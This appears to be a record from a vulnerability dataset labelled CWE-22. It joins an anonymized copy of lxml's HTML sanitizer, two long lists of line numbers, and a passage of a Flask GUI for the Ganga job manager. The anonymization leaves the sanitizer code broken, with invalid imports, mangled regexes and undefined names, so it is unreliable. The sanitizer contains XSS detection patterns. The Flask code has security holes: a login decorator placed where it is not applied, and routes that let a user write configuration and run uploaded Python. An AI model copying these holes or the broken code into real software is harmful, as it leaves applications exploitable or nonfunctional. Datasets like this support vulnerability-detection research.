VAR_66 = type(VAR_23)
if isinstance(VAR_23, VAR_72):
VAR_56 = fromstring(VAR_23)
else:
VAR_56 = copy.deepcopy(VAR_23)
FUNC_1(VAR_56, *VAR_24, **VAR_25)
return _transform_result(VAR_66, VAR_56)
FUNC_3.__doc__ = FUNC_1.__doc__
VAR_26 = ['pre', 'textarea', 'code']
VAR_27 = ['nobreak']
def FUNC_4(VAR_16, VAR_28=40,
VAR_18=VAR_26,
VAR_20=VAR_27,
VAR_29=VAR_70(0x200b)):
if VAR_16.tag in VAR_26:
return
VAR_63 = VAR_16.get('class')
if VAR_63:
VAR_91 = False
VAR_63 = VAR_63.split()
for avoid in VAR_20:
if avoid in VAR_63:
VAR_91 = True
break
if VAR_91:
return
if VAR_16.text:
VAR_16.text = FUNC_6(VAR_16.text, VAR_28, VAR_29)
for child in VAR_16:
FUNC_4(child, VAR_28=max_width,
VAR_18=avoid_elements,
VAR_20=avoid_classes,
VAR_29=break_character)
if child.tail:
child.tail = FUNC_6(child.tail, VAR_28, VAR_29)
def FUNC_5(VAR_23, *VAR_24, **VAR_25):
VAR_66 = type(VAR_23)
VAR_56 = fromstring(VAR_23)
FUNC_4(VAR_56, *VAR_24, **VAR_25)
return _transform_result(VAR_66, VAR_56)
def FUNC_6(VAR_21, VAR_28, VAR_29):
VAR_67 = VAR_21.split()
for VAR_31 in VAR_67:
if len(VAR_31) > VAR_28:
VAR_98 = FUNC_7(VAR_31, VAR_28, VAR_29)
VAR_21 = VAR_21.replace(VAR_31, VAR_98)
return VAR_21
VAR_30 = re.compile(r'[^a-z]', re.I)
def FUNC_7(VAR_31, VAR_32, VAR_29):
VAR_68 = VAR_31
VAR_69 = ''
while len(VAR_31) > VAR_32:
VAR_92 = VAR_31[:VAR_32]
VAR_93 = list(VAR_30.finditer(VAR_92))
if VAR_93:
VAR_99 = VAR_93[-1]
if VAR_99.end() > VAR_32-10:
VAR_92 = VAR_31[:VAR_99.end()]
VAR_69 += VAR_92 + VAR_29
VAR_31 = word[len(VAR_92):]
VAR_69 += VAR_31
return VAR_69
|
from __future__ import absolute_import
import copy
import re
import .sys
try:
from urlparse import .urlsplit
from urllib import unquote_plus
except ImportError:
from urllib.parse import .urlsplit, unquote_plus
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
VAR_72
except NameError:
VAR_72 = chr
try:
VAR_73
except NameError:
VAR_73 = str
try:
VAR_74
except NameError:
VAR_74 = (str, bytes)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
VAR_0 = re.compile(
r'expression\VAR_6*\(.*?\)', re.S|re.I).sub
VAR_1 = re.compile(
r'@\VAR_6*import', re.I).sub
VAR_2 = re.compile(
r'</?[a-zA-Z]+|\son[a-zA-Z]+\VAR_6*=',
*((re.ASCII,) if sys.version_info[0] >= 3 else ())).search
VAR_3 = re.compile(
r'^data:image/(.+);base64,', re.I).findall
VAR_4 = re.compile(
r'(VAR_36|jscript|livescript|vbscript|data|about|mocha):',
re.I).findall
VAR_5 = re.compile(r"(xml|svg)", re.I).findall
def FUNC_0(VAR_6):
VAR_34 = False
for image_type in VAR_3(VAR_6):
VAR_34 = True
if VAR_5(image_type):
return True
if VAR_34:
return False
return bool(VAR_4(VAR_6))
VAR_7 = re.compile(r'[\VAR_6\x00-\x08\x0B\x0C\x0E-\x19]+').sub
VAR_8 = re.compile(
r'\[if[\VAR_6\n\r]+.*?][\VAR_6\n\r]*>', re.I|re.S)
VAR_9 = etree.XPath(
"descendant-or-self::*[@VAR_38]")
VAR_10 = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class CLASS_0(object):
VAR_35 = True
VAR_36 = True
VAR_37 = True
VAR_38 = False
VAR_39 = None
VAR_40 = True
VAR_41 = True
VAR_42 = True
VAR_43 = True
VAR_44 = True
VAR_45 = True
VAR_46 = True
VAR_47 = True
VAR_48 = None
VAR_49 = None
VAR_50 = None
VAR_51 = True
VAR_52 = True
VAR_53 = defs.safe_attrs
VAR_54 = False
VAR_55 = ()
VAR_56 = {'iframe', 'embed'}
def __init__(self, **VAR_26):
VAR_75 = object()
for name, value in VAR_26.items():
VAR_96 = getattr(self, name, VAR_75)
if (VAR_96 is not None and VAR_96 is not True and VAR_96 is not False
and not isinstance(VAR_96, (frozenset, set, tuple, list))):
raise TypeError(
"Unknown parameter: %VAR_6=%r" % (name, value))
setattr(self, name, value)
if self.inline_style is None and 'inline_style' not in VAR_26:
self.inline_style = self.style
if VAR_26.get("allow_tags"):
if VAR_26.get("remove_unknown_tags"):
raise ValueError("It does not make sense to pass in both "
"allow_tags and remove_unknown_tags")
self.remove_unknown_tags = False
VAR_57 = dict(
script='src',
VAR_63='href',
applet=['code', 'object'],
iframe='src',
embed='src',
layer='src',
a='href',
)
def __call__(self, VAR_58):
try:
VAR_97 = VAR_58.getroot
except AttributeError:
pass # Element instance
else:
VAR_58 = VAR_97() # ElementTree instance, instead of an element
xhtml_to_html(VAR_58)
for VAR_17 in VAR_58.iter('image'):
VAR_17.tag = 'img'
if not self.comments:
self.kill_conditional_comments(VAR_58)
VAR_50 = set(self.kill_tags or ())
VAR_48 = set(self.remove_tags or ())
VAR_49 = set(self.allow_tags or ())
if self.scripts:
VAR_50.add('script')
if self.safe_attrs_only:
VAR_53 = set(self.safe_attrs)
for VAR_17 in VAR_58.iter(etree.Element):
VAR_102 = VAR_17.attrib
for aname in VAR_102.keys():
if aname not in VAR_53:
del VAR_102[aname]
if self.javascript:
if not (self.safe_attrs_only and
self.safe_attrs == defs.safe_attrs):
for VAR_17 in VAR_58.iter(etree.Element):
VAR_102 = VAR_17.attrib
for aname in VAR_102.keys():
if aname.startswith('on'):
del VAR_102[aname]
VAR_58.rewrite_links(self._remove_javascript_link,
resolve_base_href=False)
if not self.inline_style:
for VAR_17 in VAR_9(VAR_58):
VAR_107 = VAR_17.get('style')
VAR_86 = VAR_0('', VAR_107)
VAR_86 = VAR_1('', VAR_86)
if self._has_sneaky_javascript(VAR_86):
del VAR_17.attrib['style']
elif VAR_86 != VAR_107:
VAR_17.set('style', VAR_86)
if not self.style:
for VAR_17 in list(VAR_58.iter('style')):
if VAR_17.get('type', '').lower().strip() == 'text/javascript':
VAR_17.drop_tree()
continue
VAR_107 = VAR_17.text or ''
VAR_86 = VAR_0('', VAR_107)
VAR_86 = VAR_1('', VAR_86)
if self._has_sneaky_javascript(VAR_86):
VAR_17.text = '/* deleted */'
elif VAR_86 != VAR_107:
VAR_17.text = VAR_86
if self.comments:
VAR_50.add(etree.Comment)
if self.processing_instructions:
VAR_50.add(etree.ProcessingInstruction)
if self.style:
VAR_50.add('style')
if self.inline_style:
etree.strip_attributes(VAR_58, 'style')
if self.links:
VAR_50.add('link')
elif self.style or self.javascript:
for VAR_17 in list(VAR_58.iter('link')):
if 'stylesheet' in VAR_17.get('rel', '').lower():
if not self.allow_element(VAR_17):
VAR_17.drop_tree()
if self.meta:
VAR_50.add('meta')
if self.page_structure:
VAR_48.update(('head', 'html', 'title'))
if self.embedded:
for VAR_17 in list(VAR_58.iter('param')):
VAR_103 = VAR_17.getparent()
while VAR_103 is not None and VAR_103.tag not in ('applet', 'object'):
VAR_103 = VAR_103.getparent()
if VAR_103 is None:
VAR_17.drop_tree()
VAR_50.update(('applet',))
VAR_48.update(('iframe', 'embed', 'layer', 'object', 'param'))
if self.frames:
VAR_50.update(defs.frame_tags)
if self.forms:
VAR_48.add('form')
VAR_50.update(('button', 'input', 'select', 'textarea'))
if self.annoying_tags:
VAR_48.update(('blink', 'marquee'))
VAR_76 = []
VAR_77 = []
for VAR_17 in VAR_58.iter():
if VAR_17.tag in VAR_50:
if self.allow_element(VAR_17):
continue
VAR_77.append(VAR_17)
elif VAR_17.tag in VAR_48:
if self.allow_element(VAR_17):
continue
VAR_76.append(VAR_17)
if VAR_76 and VAR_76[0] == VAR_58:
VAR_17 = VAR_76.pop(0)
VAR_17.tag = 'div'
VAR_17.attrib.clear()
elif VAR_77 and VAR_77[0] == VAR_58:
VAR_17 = VAR_77.pop(0)
if VAR_17.tag != 'html':
VAR_17.tag = 'div'
VAR_17.clear()
VAR_77.reverse() # VAR_94 with innermost tags
for VAR_17 in VAR_77:
VAR_17.drop_tree()
for VAR_17 in VAR_76:
VAR_17.drop_tag()
if self.remove_unknown_tags:
if VAR_49:
raise ValueError(
"It does not make sense to pass in both VAR_49 and remove_unknown_tags")
VAR_49 = set(defs.tags)
if VAR_49:
if not self.comments:
VAR_49.add(etree.Comment)
if not self.processing_instructions:
VAR_49.add(etree.ProcessingInstruction)
VAR_85 = []
for VAR_17 in VAR_58.iter():
if VAR_17.tag not in VAR_49:
VAR_85.append(VAR_17)
if VAR_85:
if VAR_85[0] is VAR_58:
VAR_17 = VAR_85.pop(0)
VAR_17.tag = 'div'
VAR_17.attrib.clear()
for VAR_17 in VAR_85:
VAR_17.drop_tag()
if self.add_nofollow:
for VAR_17 in VAR_10(VAR_58):
if not self.allow_follow(VAR_17):
VAR_108 = VAR_17.get('rel')
if VAR_108:
if ('nofollow' in VAR_108
and ' nofollow ' in (' %VAR_6 ' % VAR_108)):
continue
VAR_108 = '%VAR_6 nofollow' % VAR_108
else:
VAR_108 = 'nofollow'
VAR_17.set('rel', VAR_108)
def FUNC_8(self, VAR_59):
return False
def FUNC_9(self, VAR_17):
if VAR_17.tag not in self._tag_link_attrs:
return False
VAR_78 = self._tag_link_attrs[VAR_17.tag]
if isinstance(VAR_78, (list, tuple)):
for one_attr in VAR_78:
VAR_60 = VAR_17.get(one_attr)
if not VAR_60:
return False
if not self.allow_embedded_url(VAR_17, VAR_60):
return False
return True
else:
VAR_60 = VAR_17.get(VAR_78)
if not VAR_60:
return False
return self.allow_embedded_url(VAR_17, VAR_60)
def FUNC_10(self, VAR_17, VAR_60):
if self.whitelist_tags is not None and VAR_17.tag not in self.whitelist_tags:
return False
VAR_79, VAR_80, VAR_81, VAR_82, VAR_83 = urlsplit(VAR_60)
VAR_80 = netloc.lower().split(':', 1)[0]
if VAR_79 not in ('http', 'https'):
return False
if VAR_80 in self.host_whitelist:
return True
return False
def FUNC_11(self, VAR_58):
VAR_84 = VAR_8.search
self._kill_elements(
VAR_58, lambda VAR_17: VAR_84(VAR_17.text),
etree.Comment)
def FUNC_12(self, VAR_58, VAR_61, VAR_62=None):
VAR_85 = []
for VAR_17 in VAR_58.iter(VAR_62):
if VAR_61(VAR_17):
VAR_85.append(VAR_17)
for VAR_17 in VAR_85:
VAR_17.drop_tree()
def FUNC_13(self, VAR_63):
VAR_86 = VAR_7('', unquote_plus(VAR_63))
if FUNC_0(VAR_86):
return ''
return VAR_63
VAR_64 = re.compile(r'/\*.*?\*/', re.S).sub
def FUNC_14(self, VAR_38):
VAR_38 = self._substitute_comments('', VAR_38)
VAR_38 = VAR_38.replace('\\', '')
VAR_38 = VAR_7('', VAR_38)
VAR_38 = VAR_38.lower()
if 'javascript:' in VAR_38:
return True
if 'expression(' in VAR_38:
return True
if '@import' in VAR_38:
return True
if '</noscript' in VAR_38:
return True
if VAR_2(VAR_38):
return True
return False
def VAR_12(self, VAR_24):
VAR_68 = type(VAR_24)
if isinstance(VAR_24, VAR_74):
VAR_58 = fromstring(VAR_24)
else:
VAR_58 = copy.deepcopy(VAR_24)
self(VAR_58)
return _transform_result(VAR_68, VAR_58)
VAR_11 = CLASS_0()
VAR_12 = VAR_11.clean_html
VAR_13 = [
re.compile(r'(?P<VAR_92>https?://(?P<VAR_106>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
re.compile(r'mailto:(?P<VAR_92>[a-z0-9._-]+@(?P<VAR_106>[a-z0-9_.-]+[a-z]))', re.I),
]
VAR_14 = ['textarea', 'pre', 'code', 'head', 'select', 'a']
VAR_15 = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
VAR_16 = ['nolink']
def FUNC_1(VAR_17, VAR_18=VAR_13,
VAR_19=VAR_14,
VAR_20=VAR_15,
VAR_21=VAR_16):
if VAR_17.tag in VAR_19:
return
VAR_65 = VAR_17.get('class')
if VAR_65:
VAR_65 = VAR_65.split()
for match_class in VAR_21:
if match_class in VAR_65:
return
for child in list(VAR_17):
FUNC_1(child, VAR_18=link_regexes,
VAR_19=avoid_elements,
VAR_20=avoid_hosts,
VAR_21=avoid_classes)
if child.tail:
VAR_22, VAR_98 = FUNC_2(
child.tail, VAR_18, VAR_20, VAR_23=VAR_17.makeelement)
if VAR_98:
child.tail = VAR_22
VAR_104 = VAR_17.index(child)
VAR_17[VAR_104+1:VAR_104+1] = VAR_98
if VAR_17.text:
VAR_22, VAR_87 = FUNC_2(
VAR_17.text, VAR_18, VAR_20, VAR_23=VAR_17.makeelement)
if VAR_87:
VAR_17.text = VAR_22
VAR_17[:0] = VAR_87
def FUNC_2(VAR_22, VAR_18, VAR_20, VAR_23):
VAR_66 = ''
VAR_40 = []
VAR_67 = 0
while 1:
VAR_88, VAR_89 = None, None
for regex in VAR_18:
VAR_99 = VAR_67
while 1:
VAR_105 = regex.search(VAR_22, pos=VAR_99)
if VAR_105 is None:
break
VAR_106 = VAR_105.group('host')
for host_regex in VAR_20:
if host_regex.search(VAR_106):
VAR_99 = VAR_105.end()
break
else:
break
if VAR_105 is None:
continue
if VAR_89 is None or VAR_105.start() < VAR_89:
VAR_88 = VAR_105
VAR_89 = VAR_105.start()
if VAR_88 is None:
if VAR_40:
assert not VAR_40[-1].tail
VAR_40[-1].tail = VAR_22
else:
assert not VAR_66
leading_text = VAR_22
break
VAR_63 = VAR_88.group(0)
VAR_90 = VAR_88.end()
if VAR_63.endswith('.') or VAR_63.endswith(','):
VAR_90 -= 1
VAR_63 = link[:-1]
VAR_91 = VAR_22[:VAR_88.start()]
if VAR_40:
assert not VAR_40[-1].tail
VAR_40[-1].tail = VAR_91
else:
assert not VAR_66
leading_text = VAR_91
VAR_59 = VAR_23('a')
VAR_59.set('href', VAR_63)
VAR_92 = VAR_88.group('body')
if not VAR_92:
VAR_92 = VAR_63
if VAR_92.endswith('.') or VAR_92.endswith(','):
VAR_92 = body[:-1]
VAR_59.text = VAR_92
VAR_40.append(VAR_59)
VAR_22 = text[VAR_90:]
return VAR_66, VAR_40
def FUNC_3(VAR_24, *VAR_25, **VAR_26):
VAR_68 = type(VAR_24)
if isinstance(VAR_24, VAR_74):
VAR_58 = fromstring(VAR_24)
else:
VAR_58 = copy.deepcopy(VAR_24)
FUNC_1(VAR_58, *VAR_25, **VAR_26)
return _transform_result(VAR_68, VAR_58)
FUNC_3.__doc__ = FUNC_1.__doc__
VAR_27 = ['pre', 'textarea', 'code']
VAR_28 = ['nobreak']
def FUNC_4(VAR_17, VAR_29=40,
VAR_19=VAR_27,
VAR_21=VAR_28,
VAR_30=VAR_72(0x200b)):
if VAR_17.tag in VAR_27:
return
VAR_65 = VAR_17.get('class')
if VAR_65:
VAR_93 = False
VAR_65 = VAR_65.split()
for avoid in VAR_21:
if avoid in VAR_65:
VAR_93 = True
break
if VAR_93:
return
if VAR_17.text:
VAR_17.text = FUNC_6(VAR_17.text, VAR_29, VAR_30)
for child in VAR_17:
FUNC_4(child, VAR_29=max_width,
VAR_19=avoid_elements,
VAR_21=avoid_classes,
VAR_30=break_character)
if child.tail:
child.tail = FUNC_6(child.tail, VAR_29, VAR_30)
def FUNC_5(VAR_24, *VAR_25, **VAR_26):
VAR_68 = type(VAR_24)
VAR_58 = fromstring(VAR_24)
FUNC_4(VAR_58, *VAR_25, **VAR_26)
return _transform_result(VAR_68, VAR_58)
def FUNC_6(VAR_22, VAR_29, VAR_30):
VAR_69 = VAR_22.split()
for VAR_32 in VAR_69:
if len(VAR_32) > VAR_29:
VAR_100 = FUNC_7(VAR_32, VAR_29, VAR_30)
VAR_22 = VAR_22.replace(VAR_32, VAR_100)
return VAR_22
VAR_31 = re.compile(r'[^a-z]', re.I)
def FUNC_7(VAR_32, VAR_33, VAR_30):
VAR_70 = VAR_32
VAR_71 = ''
while len(VAR_32) > VAR_33:
VAR_94 = VAR_32[:VAR_33]
VAR_95 = list(VAR_31.finditer(VAR_94))
if VAR_95:
VAR_101 = VAR_95[-1]
if VAR_101.end() > VAR_33-10:
VAR_94 = VAR_32[:VAR_101.end()]
VAR_71 += VAR_94 + VAR_30
VAR_32 = word[len(VAR_94):]
VAR_71 += VAR_32
return VAR_71
| [
1,
2,
4,
8,
10,
18,
24,
28,
33,
39,
40,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
58,
59,
60,
61,
62,
63,
64,
67,
68,
71,
75,
76,
77,
87,
89,
90,
91,
94,
97,
102,
103,
109,
112,
116,
119,
122,
125,
128,
131,
134,
137,
140,
143,
146,
149,
153,
157,
160,
163,
167,
171,
174,
183,
186,
188,
195,
198,
221,
233,
239,
240,
241,
245,
246,
251,
252,
253,
254,
255,
256,
257,
258,
261,
272,
274,
275,
279,
280,
282,
286,
299,
307,
308,
315,
326,
329,
344,
345,
348,
356,
357,
358,
366,
369,
370,
371,
378,
390,
392,
393,
398,
399,
404,
410,
417,
422,
446,
452,
456,
476,
481,
495,
506,
514,
516,
519,
522,
524,
530,
547,
550,
553,
562,
565,
566,
567,
568,
569,
572,
575,
577,
583,
585,
592,
595,
600,
630,
656,
667,
688,
697,
699,
700,
701,
702,
703,
706,
713,
716,
721,
724,
725,
747,
753,
761,
763,
772,
774,
775,
781,
782,
3,
4,
5,
6,
7,
105,
106,
107,
108,
109,
110,
111,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
137,
138,
139,
140,
141,
142,
143,
144,
145,
146,
147,
148,
149,
150,
151,
152,
153,
154,
155,
156,
157,
158,
159,
160,
161,
162,
163,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
193,
194,
195,
196,
197,
590,
591,
592,
593,
594,
595,
596,
597,
598,
599,
600,
601,
602,
603,
711,
712,
713,
714,
715,
716,
717,
718,
719,
720,
721,
722,
723,
263,
264,
265,
448,
449,
450,
454,
455,
456,
457,
458,
459,
478,
479,
480,
481,
482,
483,
484,
485,
497,
498,
499,
500,
501,
526,
527,
528,
529,
530,
531,
532,
533,
534,
535
] | [
1,
2,
4,
8,
10,
18,
24,
28,
33,
39,
40,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
58,
59,
60,
61,
62,
63,
64,
67,
68,
71,
75,
76,
77,
83,
85,
95,
97,
98,
101,
104,
109,
110,
116,
119,
123,
126,
129,
132,
135,
138,
141,
144,
147,
150,
153,
156,
160,
164,
167,
170,
174,
178,
181,
190,
193,
195,
202,
205,
228,
240,
246,
247,
248,
252,
253,
258,
259,
260,
261,
262,
263,
264,
265,
268,
279,
281,
282,
286,
287,
289,
293,
306,
314,
315,
322,
333,
336,
351,
352,
355,
363,
364,
365,
373,
376,
377,
378,
385,
397,
399,
400,
405,
406,
411,
417,
424,
429,
453,
459,
463,
483,
488,
502,
513,
521,
523,
526,
529,
531,
537,
554,
557,
560,
569,
572,
573,
574,
575,
576,
579,
582,
584,
590,
592,
599,
602,
607,
637,
663,
674,
695,
704,
706,
707,
708,
709,
710,
713,
720,
723,
728,
731,
732,
754,
760,
768,
770,
779,
781,
782,
788,
789,
3,
4,
5,
6,
7,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
137,
138,
139,
140,
141,
142,
143,
144,
145,
146,
147,
148,
149,
150,
151,
152,
153,
154,
155,
156,
157,
158,
159,
160,
161,
162,
163,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
193,
194,
195,
196,
197,
198,
199,
200,
201,
202,
203,
204,
597,
598,
599,
600,
601,
602,
603,
604,
605,
606,
607,
608,
609,
610,
718,
719,
720,
721,
722,
723,
724,
725,
726,
727,
728,
729,
730,
270,
271,
272,
455,
456,
457,
461,
462,
463,
464,
465,
466,
485,
486,
487,
488,
489,
490,
491,
492,
504,
505,
506,
507,
508,
533,
534,
535,
536,
537,
538,
539,
540,
541,
542
] |
0CWE-22
| import os
import jwt
import json
import requests
import time
import select
import termios
import struct
import fcntl
import subprocess
import pty
import sys
import datetime
from functools import wraps
from werkzeug.utils import secure_filename
from werkzeug.security import generate_password_hash, check_password_hash
from flask import Flask, request, jsonify, render_template, flash, redirect, url_for, session, send_file, make_response
from flask_login import login_user, login_required, logout_user, current_user, UserMixin
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_socketio import SocketIO
from GangaGUI.gui.config import Config
# ******************** Initialisation of Flask App for GUI ******************** #
# GUI Flask App and set configuration from ./config.py file
gui = Flask(__name__)
gui.config.from_object(Config)
# Database object which is used to interact with the "gui.sqlite" in gangadir/gui folder
# NOTE: IT HAS NO RELATION WITH THE GANGA PERSISTENT DATABASE
db = SQLAlchemy(gui)
# Login manage for the view routes
login = LoginManager(gui)
login.login_view = "login"
login.login_message = "Please Login to Access this Page."
login.login_message_category = "warning"
# For websocket, for communication between frontend and backend
socketio = SocketIO(gui)
# ******************** The user class for database and authentication ******************** #
# ORM Class to represent Users - used to access the GUI & API resources
class User(UserMixin, db.Model):
__tablename__ = "users"
id = db.Column(db.Integer, primary_key=True)
public_id = db.Column(db.String(64), unique=True)
user = db.Column(db.String(32), unique=True)
password_hash = db.Column(db.String(64))
role = db.Column(db.String(32))
pinned_jobs = db.Column(db.Text)
def store_password_hash(self, password: str):
self.password_hash = generate_password_hash(password)
def verify_password(self, password: str) -> bool:
return check_password_hash(self.password_hash, password)
def generate_auth_token(self, expires_in_days: int = 5) -> str:
return jwt.encode(
{"public_id": self.public_id, "exp": datetime.datetime.utcnow() + datetime.timedelta(days=expires_in_days)},
gui.config["SECRET_KEY"], algorithm="HS256")
def __repr__(self):
return "User {}: {} (Public ID: {}, Role: {})".format(self.id, self.user, self.public_id, self.role)
# User Loader Function for Flask Login
@login.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
# ******************** Global Variables ******************** #
# Colors showed for different job statuses in the GUI based on Bootstrap CSS
status_color = {
"new": "info",
"completed": "success",
"completed_frozen" : "success",
"failed": "danger",
"failed_frozen" : "danger",
"running": "primary",
"submitted": "secondary",
"killed": "warning"
}
# Allowed extensions when uploading any files to GUI
ALLOWED_EXTENSIONS = {"txt", "py"}
# Variables to globally store plugins and actions
actions = {}
plugins = {}
# ******************** Run Before First Request ******************** #
# Execute before first request
@gui.before_first_request
def initial_run():
"""
This function runs before first request. It stores actions and plugins information from the ganga. It create default session cookies. If WEB_CLI is also started then it also starts a Ganga session.
"""
global actions, plugins
# Start ganga if WEB_CLI mode is True
if gui.config['WEB_CLI'] is True:
start_ganga(gui.config['INTERNAL_PORT'], args=gui.config["GANGA_ARGS"])
session["WEB_CLI"] = True
elif gui.config['INTERNAL_PORT'] is None:
gui.config['INTERNAL_PORT'] = os.environ['INTERNAL_PORT']
# If user is authenticated, log them out. This happens after a fresh start of the GUI server.
if current_user.is_authenticated:
logout_user()
# Create user session defaults
create_session_defaults()
# Check if internal server is online, exit after 20s of retrying
if not ping_internal():
print("INTERNAL SERVER UNAVAILABLE, TERMINATING...")
sys.exit(1)
# Get job actions and plugins information from ganga
try:
# Get actions and plugins data once
actions = query_internal_api("/internal/jobs/actions", "get")
plugins = query_internal_api("/internal/plugins", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
# ******************** View Routes ******************** #
# Login View
@gui.route("/login", methods=["GET", "POST"])
def login():
"""
Handles login route of the GUI.
"""
# If already authenticated, logout
if current_user.is_authenticated:
return redirect(url_for("dashboard"))
# Login user
if request.method == "POST":
# Form data
username = request.form.get("username")
password = request.form.get("password")
# Database query
user = User.query.filter_by(user=username).first()
# If valid user, login
if user and user.verify_password(password):
login_user(user, True)
flash("Login successful", "success")
return redirect(url_for("dashboard"))
flash("Error identifying the user", "danger")
# Get users from the database
users = User.query.all()
return render_template("login.html", title="Login", users=users)
# Logout View
@gui.route("/logout", methods=["GET"])
def logout():
"""
Logout user from GUI
"""
# Logout
if current_user.is_authenticated:
logout_user()
return redirect(url_for("login"))
# Dashboard view
@gui.route("/")
@login_required
def dashboard():
"""
Handles the dashboard route of the GUI.
"""
quick_statistics = {}
recent_jobs_info = []
pinned_jobs_info = []
try:
# Query overall statistics
quick_statistics = query_internal_api("/internal/jobs/statistics", "get")
# Query recent 10 jobs
recent_jobs_info = query_internal_api("/internal/jobs/recent", "get")
# Query pinned jobs
u = current_user
pinned_jobs_info = query_internal_api("/internal/jobs", "get", params={
"ids": u.pinned_jobs if u.pinned_jobs is not None else json.dumps([]),
"auto-validate-ids": True})
except Exception as err:
# Flash the error in the GUI
flash(str(err), "danger")
return render_template("dashboard.html",
title="Dashboard",
quick_statistics=quick_statistics,
recent_jobs_info=recent_jobs_info,
pinned_jobs_info=pinned_jobs_info,
status_color=status_color)
# Config view
@gui.route("/config", methods=["GET", "POST"])
@login_required
def config_page():
"""
Handles the config route of the GUI.
"""
full_config_info = []
config_info = []
section = None
# When GUI request for specific section
if request.method == "POST":
# Get section name for request form data
section = request.form.get("section")
section = None if section in ["", None] else section
try:
# Query full config
full_config_info = query_internal_api("/internal/config", "get")
# If asked for specific section, add only that for displaying
config_info = full_config_info if section is None else [s for s in full_config_info if s["name"] == section]
except Exception as err:
# Flash the error in the GUI
flash(str(err), "danger")
return render_template("config.html", title="Config", full_config_info=full_config_info, config_info=config_info)
#Edit gangarc
@gui.route("/config_edit",methods=["GET", "POST"])
@login_required
def edit_config_page():
"""
Edit gangarc file from the GUI
"""
gui_rc = gui.config["GANGA_RC"]
with open(gui_rc, "rt") as f:
ganga_config = f.read()
if request.method == 'POST':
config_ganga = request.form['config-data']
with open(gui_rc, 'w') as f1:
f1.write(str(config_ganga))
flash(".gangarc Edited", "success")
with open(gui_rc, "rt") as f2:
ganga_config = f2.read()
return render_template("config_edit.html", title="Edit gangarc", ganga_config=ganga_config)
@login_required
# Create view
@gui.route("/create", methods=["GET", "POST"])
def create_page():
"""
Handles create route of the GUI.
"""
# Handle file uploads
if request.method == "POST":
# Load from the uploaded file
if "loadfile" in request.files:
loadfile = request.files["loadfile"]
if loadfile.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
# If valid file, the save the file
if loadfile and allowed_file(loadfile.filename):
save_path = os.path.join(gui.config["UPLOAD_FOLDER"], "loadfile.txt")
loadfile.save(save_path)
# Load the file
try:
# Query to load the file
response_info = query_internal_api("/internal/load", "get", params={"path": save_path})
except Exception as err:
# Display error in the GUI
flash(str(err), "danger")
return redirect(request.url)
# Success message
flash(response_info.get("message"), "success")
return redirect(request.url)
# Run file using the runfile GPI function
if "runfile" in request.files:
runfile = request.files["runfile"]
if runfile.filename == "":
flash("No file selected", "warning")
return redirect(request.url)
# If valid file, save the file
if runfile and allowed_file(runfile.filename):
save_path = os.path.join(gui.config["UPLOAD_FOLDER"], "runfile.py")
runfile.save(save_path)
# Run the file
try:
# Query ganga to run the file
response_info = query_internal_api("/internal/runfile", "get", params={"path": save_path})
except Exception as err:
# Display error back to GUI
flash(str(err), "danger")
return redirect(request.url)
# Success message
flash(response_info.get("message"), "success")
return redirect(request.url)
# No file case
flash("No file, retry!", "warning")
return redirect(request.url)
try:
# Query templates info
templates_info = query_internal_api("/internal/templates", "get",
params={"recent": True, "length": "6"})
except Exception as err:
# Display error to GUI
flash(str(err), "danger")
return redirect(url_for("dashboard"))
return render_template("create.html", title="Create", templates_info=templates_info)
# Runfile view
@gui.route("/create/runfile", methods=["GET", "POST"])
@login_required
def runfile_page():
"""
Quick create a runfile to be run using the runfile GPI function.
"""
# Runfile path
runfile_path = os.path.join(gui.config["UPLOAD_FOLDER"], "runfile.py")
# Save runfile data from frontend
if request.method == "POST":
runfile_data = request.form.get("runfile-data")
with open(runfile_path, "w+") as f:
f.write(runfile_data)
# Run the file
try:
# Query ganga to run the file
response_info = query_internal_api("/internal/runfile", "get", params={"path": runfile_path})
flash(response_info["message"], "success")
except Exception as err:
# Display error back in the GUI
flash(str(err), "danger")
return redirect(request.url)
return render_template("runfile.html", title="Runfile")
# Templates view
@gui.route("/templates", methods=["GET", "POST"])
@login_required
def templates_page():
"""
Handles the templates route of the GUI. Displays templates in a tabular form.
"""
# Update filter values
if request.method == "POST":
# Add filter data to user session
session["templates_per_page"] = int(request.form.get("templates-per-page"))
session["templates_filter"] = {key: request.form.get(form_name) for key, form_name in
zip(["application", "backend"], ["template-application", "template-backend"])}
# Current page
current_page = int(request.args.get("page")) if request.args.get("page") is not None else 0
# Get user defined value from session
templates_per_page = session["templates_per_page"]
try:
# Query total number of templates
templates_length = query_internal_api("/internal/templates/length", "get", params=session["templates_filter"])
# Calculate number of max pages
number_of_pages = (int(templates_length) // int(templates_per_page)) + 1
# if current page exceeds last possible page, redirect to last page
if current_page >= number_of_pages:
return redirect(url_for("templates_page", page=number_of_pages - 1))
# Add templates filters and range options for query params
params = session["templates_filter"].copy()
params.update({
"recent": True,
"length": templates_per_page,
